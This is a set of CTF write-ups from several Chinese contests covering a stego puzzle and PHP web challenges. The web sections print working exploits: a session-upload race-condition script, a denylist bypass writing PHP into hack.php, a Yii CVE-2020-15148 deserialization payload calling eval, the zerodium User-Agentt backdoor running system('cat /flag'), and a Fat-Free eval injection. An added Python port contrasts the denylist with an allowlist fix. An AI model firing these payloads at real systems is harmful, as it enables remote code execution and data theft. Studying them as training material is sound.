Some recent CTF write-ups

The 1st Guangdong University Student Cybersecurity Attack and Defense Competition (第一届广东大学生网络安全攻防大赛)

Misc

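Piggy's Home (小猪的家)

binwalk -e pig.png extracts an archive, pigpen.zip

Rename the png to gif

Change the colors in stegsolve

This reveals QR code fragments

Stitch the QR code together, which gives: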

JUZFU2C2NJTTETKUKF3Q====

base32 decode:

M2ZhZjg2MTQw

Base64 decode:

3faf86140

This is the archive password

Extracting the archive gives a pigpen cipher

flag{this_isa_pigpen_fake_flag}

CISCN2021

Web

easy_source

A reused challenge; the original:

https://r0yanx.com/2020/10/28/fslh-writeup/

middle_source

https://blog.csdn.net/mochu7777777/article/details/116499336

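PHP_SESSION_UPLOAD_PROGRESS + race condition

A scan turned up .listing

It lists you_can_seeeeeeee_me.php

which is a phpinfo page

Many functions are disabled

Use scandir to search manually under etc

One entry looks very suspicious

Following it leads through many nested directory levels

Each team's directory is different

Seriously...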

#coding=utf-8

import io
import requests
import threading

sessid = 'AAAA'
#file_get_contents
# The upload-progress value carries the PHP to run; "cf" points the include at the session file.
data = {'PHP_SESSION_UPLOAD_PROGRESS': '<?php $a = scandir("/etc/");var_dump($a);?>',"field":"abcababaa","cf":"../../../../../../../var/lib/php/sessions/dfhjecdbcc/sess_"+sessid}

def write(session):
    # Not started below; kept from the original script.
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post('http://121.36.24.90:25186/', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php phpinfo();?>'}, files={'file': ('AAAA.txt',f)}, cookies={'PHPSESSID': sessid} )

def read(session):
    # Upload and include the session file in the same request, racing the cleanup.
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post('http://121.36.24.90:25186/', data=data, files={'file': ('AAAA.txt',f)}, cookies={'PHPSESSID': sessid} )
        # 2037 is presumably the length of the unmodified response.
        if len(resp.text) != 2037:
            print(resp.text)

if __name__=="__main__":
    event=threading.Event()
    with requests.session() as session:
        for i in range(1,30):
            threading.Thread(target=read,args=(session,)).start()
    event.set()

Red Hat Cup 2021 (红帽杯2021)

Web

find_it

http://eci-2ze5dz17y89pj02zub57.cloudeci1.ichunqiu.com/robots.txt

When I was a child,I also like to read Robots.txt Here is what you want:1ndexx.php

http://eci-2ze5dz17y89pj02zub57.cloudeci1.ichunqiu.com/.1ndexx.php.swp

<?php $link = mysql_connect('localhost', 'root'); ?>
<html>
<head>
<title>Hello worldd!</title>
<style>
body {
background-color: white;
text-align: center;
padding: 50px;
font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
}

#logo {
margin-bottom: 40px;
}
</style>
</head>
<body>
<img id="logo" src="logo.png" />
<h1><?php echo "Hello My freind!"; ?></h1>
<?php if($link) { ?>
<h2>I Can't view my php files?!</h2>
<?php } else { ?>
<h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2>
<?php } ?>
</body>
</html>
<?php

#Really easy...

$file=fopen("flag.php","r") or die("Unable 2 open!");

$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));


$hack=fopen("hack.php","w") or die("Unable 2 open");

$a=$_GET['code'];

if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
die("you die");
}
if(strlen($a)>33){
die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>

Payload:

index?code=<?php show_source($_GET['a']);?>

hack.php?a=flag.php

This reads:

<?php 

#ini_set('display_errors',true);
#error_reporting(E_ALL ^ E_NOTICE);

flag=MZWGCZ33GU2TSMJZMNRTMLLDGQYDGLJUGI3TELLBGFSTCLLEGVQTEMRYMU3DQYRWMZ6Q====;

echo "What is important for a new bird of php??"
?>

http://ctf.ssleye.com/base64.html

Decode with base32
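
Why the find_it payload above gets through the filter in the leaked 1ndexx.php source, as an added example that is not part of the original write-up or the challenge code: a Python port of the two checks, run against the payload from this page, next to an allowlist check. The function names and the allowlist policy (a short plain-text label) are assumptions made for illustration.

```python
import re

# Denylist copied verbatim from the preg_match() call in the leaked source.
DENYLIST = re.compile(
    r"system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace"
    r"|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include"
    r"|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump"
)
MAX_LEN = 33  # the source rejects strlen($a) > 33


def challenge_filter(code):
    """Python port of the two checks; returns the verdict the PHP would give."""
    if DENYLIST.search(code):  # preg_match without /i, so matching is case-sensitive
        return "you die"
    if len(code) > MAX_LEN:
        return "nonono."
    return "written to hack.php"


def denylist_hits(code, ignore_case=False):
    """List every denylisted token found, optionally matching case-insensitively."""
    flags = re.IGNORECASE if ignore_case else 0
    hits = {m.group(0).lower() for m in re.finditer(DENYLIST.pattern, code, flags)}
    return sorted(hits)


# Hardened check (assumption: the feature only needs to store a short label).
# Allowlisting characters means no PHP tag, quote, '$' or parenthesis can pass,
# whatever function names exist. The underlying fix is still not to write
# request input into a file the server executes as PHP.
ALLOWED = re.compile(r"[A-Za-z0-9 _.-]{1,33}")


def allowlist_filter(code):
    return ALLOWED.fullmatch(code) is not None


PAGE_PAYLOAD = "<?php show_source($_GET['a']);?>"  # payload given in the write-up

if __name__ == "__main__":
    print(len(PAGE_PAYLOAD), challenge_filter(PAGE_PAYLOAD))
    print(denylist_hits(PAGE_PAYLOAD), denylist_hits(PAGE_PAYLOAD, ignore_case=True))
    print(allowlist_filter(PAGE_PAYLOAD), allowlist_filter("hello world"))
```

The payload fits the length limit and hits no token: show_source is not on the list, and $_GET only matches "get" when the comparison ignores case.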

framework

Source code leak: www.zip

http://eci-2zecqobeh1kk8w7rdiks.cloudeci1.ichunqiu.com:80

https://forum.butian.net/share/56

A reused challenge

CVE-2020-15148

Deserialization

/index.php?r=site%2Fabout&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MzI6InlpaVxjYWNoaW5nXEV4cHJlc3Npb25EZXBlbmRlbmN5IjoxOntzOjEwOiJleHByZXNzaW9uIjtzOjIwOiJldmFsKCRfR0VUWyJjb2RlIl0pOyI7fWk6MTtzOjE4OiJldmFsdWF0ZURlcGVuZGVuY3kiO319fQ==&code=phpinfo();

Then use AntSword (蚁剑) and get past the disable restrictions in one go

HuFu CTF (虎符CTF)

Web

Sign-in (签到)

PHP source code backdoor

Note the extra t after agent:

User-Agentt:zerodiumsystem("cat /flag");

unsetme

Fat-Free framework

Auditing base.php: there is an eval at line 530

Construct the payload

?a=asd&a=asd%0a,$abc);system("ls"